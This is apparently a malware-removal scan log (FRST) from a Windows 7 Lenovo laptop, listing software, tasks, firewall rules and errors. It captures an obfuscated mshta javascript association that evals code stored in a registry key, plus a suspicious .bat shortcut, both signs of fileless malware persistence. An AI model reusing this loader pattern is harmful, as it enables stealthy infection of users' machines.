Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)

Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - Canon Inc.)

Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)

Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)

Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)

Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)

Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version:  - Canon Inc.)

Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.2 - Canon Inc.)

Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)

Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)

Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)

Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)

Conexant 20672 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.32.23.5 - Conexant)

Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

Disable AMT Profile Synchronization Pop-up for Windows XP/Vista/7 (HKLM\...\DisableAMTPopup) (Version: 1.00 - )

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.59 - Google Inc.)

Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7619.1252 - Google Inc.)

Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden

Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden

Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden

Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1011 - Intel Corporation)

Intel® Identity Protection Technology 1.2.32.0 (HKLM-x32\...\{2D793E41-F598-1014-9984-F3B169A93F79}) (Version: 1.2.32.0 - Intel Corporation)

Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.1.80.1211 - Intel Corporation)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)

Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)

Intel® Update Manager (x32 Version: 1.6.3.70 - Intel Corporation) Hidden

Intel® WiDi (HKLM\...\{F949AE30-83D1-41B2-92D2-F44478DD058A}) (Version: 4.2.24.0 - Intel Corporation)

Intel® PROSet/Wireless Software (HKLM-x32\...\{a9888f41-68ae-43df-bd7d-d93405a44106}) (Version: 17.13.11 - Intel Corporation)

Java 7 Update 76 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217076FF}) (Version: 7.0.760 - Oracle)

Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 1.00 - )

Lenovo Patch Utility (HKLM-x32\...\{AD32F5E9-6BDD-480A-8B7B-95571D04691C}) (Version: 1.3.1.1 - Lenovo Group Limited)

Lenovo Patch Utility 64 bit (HKLM\...\{0369F866-2CE0-4EB9-B426-88FA122C6E82}) (Version: 1.3.0.9 - Lenovo Group Limited)

Lenovo Power Management Driver (Version: 1.67.12.16 - Lenovo) Hidden

Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)

Lenovo Screen Reading Optimizer (HKLM-x32\...\{91A29166-4E1B-4664-B70B-4C4A3B6B3372}) (Version: 1.16 - Lenovo)

Lenovo Solution Center (HKLM\...\{AB46AC6D-3E9A-4484-8061-64FF10301B41}) (Version: 3.3.002.00 - Lenovo)

Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - )

Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.07.0037 - Lenovo)

Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)

Lenovo User Guide (HKLM-x32\...\{13F59938-C595-479C-B479-F171AB9AF64F}) (Version: 1.0.0008.00 - Lenovo)

Lenovo Warranty Information (HKLM-x32\...\{FD4EC278-C1B1-4496-99ED-C0BE1B0AA521}) (Version: 1.0.0005.00 - Lenovo)

Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)

Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)

McAfee Agent (HKLM-x32\...\{EBF3D65F-011E-44D2-8F4F-C74B52682EDD}) (Version: 4.8.0.1500 - McAfee, Inc.)

McAfee VirusScan Enterprise (HKLM-x32\...\{CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF}) (Version: 8.8.06000 - McAfee, Inc.)

Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden

Message Center Plus (HKLM\...\{C2C2DB64-1BCE-4FA7-962D-457795ECCEC0}) (Version: 3.3.0004.00 - Lenovo Group Limited)

Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden

Metric Collection SDK 35 (x32 Version: 1.2.0006.00 - Lenovo Group Limited) Hidden

Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)

Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)

Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)

Mozilla Firefox 49.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 49.0.1 (x86 en-US)) (Version: 49.0.1 - Mozilla)

Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.1.6109 - Mozilla)

Mp3tag v2.71 (HKLM-x32\...\Mp3tag) (Version: v2.71 - Florian Heidenreich)

On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.73.01 - )

Potplayer-64 bit (HKLM\...\PotPlayer64) (Version:  - Kakao Corp.)

Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.68.10 - Lenovo Group Limited)

RapidBoot (HKLM\...\{5E2652DF-743F-482B-A593-C95F431A5769}) (Version: 1.10 - Lenovo)

Registry Patch to Enable Maximum Power Saving on WiFi Adapters for Windows 7 (HKLM\...\EnablePS) (Version: 1.00 - )

RICOH_Media_Driver_v2.13.18.02 (HKLM-x32\...\{FE041B02-234C-4AAA-9511-80DF6482A458}) (Version: 2.13.18.02 - RICOH)

Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)

Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation)

Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)

ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.42 - )

ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )

ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo)

ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.26.81 - Lenovo)

ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.74 - Lenovo)

ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.11.0.0 - Lenovo)

VIPAccess (HKLM-x32\...\{E8D46836-CD55-453C-A107-A59EC51CB8DC}) (Version: 2.0.1.91 - VeriSign)

Windows Driver Package - Intel (e1cexpress) Net  (12/21/2010 11.8.84.0) (HKLM\...\6D23A494E9A245843FB8584D9307D3E328DF8613) (Version: 12/21/2010 11.8.84.0 - Intel)

Windows Driver Package - Intel (MEIx64) System  (10/19/2010 7.0.0.1144) (HKLM\...\90FD26A77B849AE03FF5F07A1CDA7F950406A8D8) (Version: 10/19/2010 7.0.0.1144 - Intel)

Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\0CDBDD444A1F5FFEA227B4E7DCE195F11F08240A) (Version: 09/10/2010 9.2.0.1011 - Intel)

Windows Driver Package - Intel System  (09/10/2010 9.2.0.1011) (HKLM\...\A513FC5E5A08D4EF27F234E91E0E942A0234210B) (Version: 09/10/2010 9.2.0.1011 - Intel)

Windows Driver Package - Intel System  (10/04/2010 9.2.0.1015) (HKLM\...\FE1BEBFD475BB832AAF104F5C63348E98A9286DF) (Version: 10/04/2010 9.2.0.1015 - Intel)

Windows Driver Package - Intel USB  (09/16/2010 9.2.0.1013) (HKLM\...\D97688B8E3830BF9820E15EB8D9552DCBF988CFD) (Version: 09/16/2010 9.2.0.1013 - Intel)

Windows Driver Package - Lenovo 1.62.00.00 (01/19/2011 1.62.00.00) (HKLM\...\D01A7EE241898C810674C69EB908D655D149BE77) (Version: 01/19/2011 1.62.00.00 - Lenovo)

Windows Driver Package - Synaptics (SynTP) Mouse  (05/05/2011 15.3.6.0) (HKLM\...\C63C03BF3BE2B6F6204BB54541690449FFF79F4F) (Version: 05/05/2011 15.3.6.0 - Synaptics)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)

Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

 

==================== Custom CLSID (Whitelisted): ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== Scheduled Tasks (Whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

Task: {03F4E4A8-6650-450E-B602-7D6032954BD8} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-04-20] (Lenovo)

Task: {127E1244-6272-4841-9A8E-A3B0A1E08CD4} - System32\Tasks\Lenovo\Message Center Plus Launcher => C:\Program Files (x86)\Lenovo\message center plus\mcplaunch.exe [2014-09-13] (Lenovo)

Task: {3C77B26C-534F-4613-A1E0-9147FA029E6E} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)"

Task: {41254CBE-BE8E-4EBE-AE49-C2E30CA9947E} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)

Task: {440D6F89-2BAA-4EC9-9C9D-8A3AE544B210} - System32\Tasks\Lenovo\LSC\LSCTaskService => C:\Program Files\Lenovo\Lenovo Solution Center\App\LSCTaskService.exe

Task: {55FB8BD6-8C4C-4920-91B5-692D04045384} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)

Task: {5EE08B5E-D6A7-4F92-904C-2E271853A892} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2016-04-14] (Lenovo Group Limited)

Task: {637CEB23-19E3-4FCF-B1D2-61109D529939} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)

Task: {6DC323AF-E881-40DB-86B6-2688501CE555} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\Bootstrap.exe [2013-07-18] (Intel Corporation)

Task: {90C5AA67-EF23-490C-AFCE-431D19BC7B18} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)

Task: {90F0D108-CFF4-4F30-8C9C-5B59ACAA6575} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2014-09-13] (Lenovo)

Task: {938017A0-02C6-4DF7-AEB0-6D3BE6B25996} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe

Task: {9D9EE676-C781-48C4-AF2D-307B6C83E669} - System32\Tasks\Lenovo\SROptimizer => C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\\SRORest.exe [2012-03-05] (Lenovo Group Limited)

Task: {9DD3046C-36ED-4E44-9BBE-C23AC588FAB8} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)

Task: {A94CD08B-C77E-4067-99A1-5D6B5DFD53FB} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\Bootstrap.exe [2013-07-18] (Intel Corporation)

Task: {B42F4A52-F3B1-4202-9829-30D4DEB32DF2} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-04-20] ()

Task: {B5C085DD-62CF-4F9B-863E-691BC8B15B81} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)

Task: {C34C57A6-1780-4938-AD2E-D5E2595F7A9E} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-09-10] ()

Task: {C7978D9E-39F9-4D04-A5F3-99917A5E71E9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)

Task: {D497E88F-86B7-47D5-8BFD-58BB151D6E9A} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo)

Task: {DA927600-D95C-4BE2-86D4-0D34262FBA8E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-15] (Adobe Systems Incorporated)

Task: {EFF1F180-818C-44EE-99C3-35CE783B2461} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()

Task: {F19D65BF-FFD7-488E-81FC-CBFD694B199D} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-09-10] ()

Task: {F3DF85DF-DCFB-42F3-9E95-75B631729CA9} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe

Task: {FB56393F-3829-44D5-97C4-9FA16D7AF324} - System32\Tasks\Lenovo\LSC\LSCHardwareScanPostpone => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exeq-backgroundmon scripts\backgroundmon.xml

Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

 

==================== Shortcuts =============================

 

(The entries could be listed to be restored or removed.)

 

Shortcut: C:\Users\Wayne\AppData\Local\1282a1\9867e1.lnk -> C:\Users\Wayne\AppData\Local\1282a1\9dc0dc.bat ()

 

==================== Loaded Modules (Whitelisted) ==============

 

2011-10-23 13:48 - 2016-04-14 06:08 - 00107008 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL

2011-10-23 13:43 - 2010-10-26 10:40 - 00049056 ____N () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe

2011-10-23 13:46 - 2016-03-02 00:52 - 00102904 _____ () C:\Windows\System32\IccLibDll_x64.dll

2016-10-15 16:06 - 2016-09-10 12:13 - 00028544 _____ () C:\Program Files (x86)\Lenovo\System Update\SUService.exe

2007-04-18 19:30 - 2007-04-18 19:30 - 00393216 _____ () C:\Program Files (x86)\McAfee\Common Framework\cryptocme2.dll

2007-04-18 19:30 - 2007-04-18 19:30 - 00471040 _____ () C:\Program Files (x86)\McAfee\Common Framework\ccme_base.dll

2016-10-15 15:03 - 2016-10-15 15:03 - 19635392 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_185.dll

 

==================== Alternate Data Streams (Whitelisted) =========

 

(If an entry is included in the fixlist, only the ADS will be removed.)

 

 

==================== Safe Mode (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

 

==================== Association (Whitelisted) ===============

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

 

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:dsaT6h="Sz";w6y7=new ActiveXObject("WScript.Shell");a9iPMbV="oYd";jpfB1=w6y7.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");mx28du="7";eval(jpfB1);W51AyG="0mYHVY";" <===== ATTENTION

 

==================== Internet Explorer trusted/restricted ===============

 

(If an entry is included in the fixlist, it will be removed from the registry.)

 

 

==================== Hosts content: ===============================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2009-07-13 16:34 - 2009-06-10 11:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

 

 

==================== Other Areas ============================

 

(Currently there is no automatic fix for this section.)

 

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Wayne\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

DNS Servers: 192.168.1.1

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

 

==================== MSCONFIG/TASK MANAGER disabled items ==

 

MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

 

==================== FirewallRules (Whitelisted) ===============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

FirewallRules: [{557FD2C9-2A62-466B-8816-BE633032D5CD}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe

FirewallRules: [{03DFB3DC-2095-4510-A567-0FD1AC84D38E}] => (Allow) LPort=2869

FirewallRules: [{939994F3-B029-408E-A45B-656D662258E5}] => (Allow) LPort=1900

FirewallRules: [{FB2FBBC5-CFB5-4C0D-9B9D-AB475DA6AB32}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe

FirewallRules: [{35BA6FB7-E803-42FD-B4E5-C83BAC48B6FC}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe

FirewallRules: [{272A8282-9BDC-4E20-B536-3C4E8B96312B}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{05BDB8A8-4D5A-4E2D-A4F1-415929A64E19}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{AC727E4B-2EA7-4F3F-BFF0-F79E00246AF9}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{D4AD504C-892E-4438-BDE4-9DB67DD5B7BA}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{CC021E9A-1E83-4E51-997E-170E3B0D0E7B}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [{11E3ABC0-8855-454E-AA19-D7473CD862E3}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe

FirewallRules: [TCP Query User{F0458B1B-4AF2-4B5E-AC7E-5EC679054837}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe

FirewallRules: [UDP Query User{7E53DAB9-4A4C-431A-AAAB-8AA0F88D2DE1}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe

FirewallRules: [{30334865-C066-41CD-9C1F-8254C57A1B1B}] => (Block) C:\program files (x86)\java\jre7\bin\java.exe

FirewallRules: [{EEA64370-148F-4DA2-8044-A785490116B2}] => (Block) C:\program files (x86)\java\jre7\bin\java.exe

FirewallRules: [{E1757C0D-F532-4F82-AE9E-3D9E867F2A08}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe

FirewallRules: [{CD716B18-5F73-4411-8B74-236BD61D44C8}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe

FirewallRules: [{803C93D3-96A6-446E-8D23-23BCADB6445A}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe

FirewallRules: [{4CB06D72-5D6E-49DF-A836-79D73949BD90}] => (Allow) C:\Program Files (x86)\McAfee\Common Framework\MfeServiceMgr.exe

FirewallRules: [{EC124B96-498B-4861-908B-3C4D7DAC6F87}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{87242A7F-F3FA-4D44-B1C7-A56539FCF863}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{C07E1440-D3D1-4BB5-BA8C-5D939796F63C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe

FirewallRules: [{DAEDB0D2-9B07-4435-B2B8-F9470E3F1F5A}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe

FirewallRules: [{E363884B-A318-4E92-B78D-F56F23ECC504}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe

FirewallRules: [{CCADAA90-51EF-41DF-AA38-0EE14A47FA39}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

FirewallRules: [{3C9229B1-0649-4BBC-BDE6-E400F423E93A}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe

FirewallRules: [{B3A06D6F-A82C-457C-A2D5-CBF7B818DF20}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe

 

==================== Restore Points =========================

 

25-09-2016 10:34:02 Windows Update

26-09-2016 03:00:33 Windows Update

29-09-2016 20:56:38 Windows Update

03-10-2016 20:50:41 Windows Update

09-10-2016 22:13:22 Windows Update

09-10-2016 22:51:07 Windows Update

15-10-2016 15:29:16 Windows Update

15-10-2016 23:27:47 Restore Point Created by FRST

16-10-2016 00:44:12 Windows Update

 

==================== Faulty Device Manager Devices =============

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (10/16/2016 09:40:29 AM) (Source: WinMgmt) (EventID: 10) (User: )

Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

 

Error: (10/16/2016 08:54:37 AM) (Source: PC-Doctor) (EventID: 1) (User: )

Description: (1932) Asapi: (08:54:37:4440)(1932) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

 

Error: (10/16/2016 08:31:55 AM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: CAMService.exe, version: 1.0.0.1, time stamp: 0x54077d08

Faulting module name: ntdll.dll, version: 6.1.7601.23543, time stamp: 0x57d2fde1

Exception code: 0xc0000005

Fault offset: 0x0000000000048d84

Faulting process id: 0x784

Faulting application start time: 0x01d227db822ebf02

Faulting application path: C:\Program Files\Intel\CAM\bin\CAMService.exe

Faulting module path: C:\Windows\SYSTEM32\ntdll.dll

Report Id: cfe0acda-93ce-11e6-a940-f0def19d1112

 

Error: (10/16/2016 08:31:52 AM) (Source: WinMgmt) (EventID: 10) (User: )

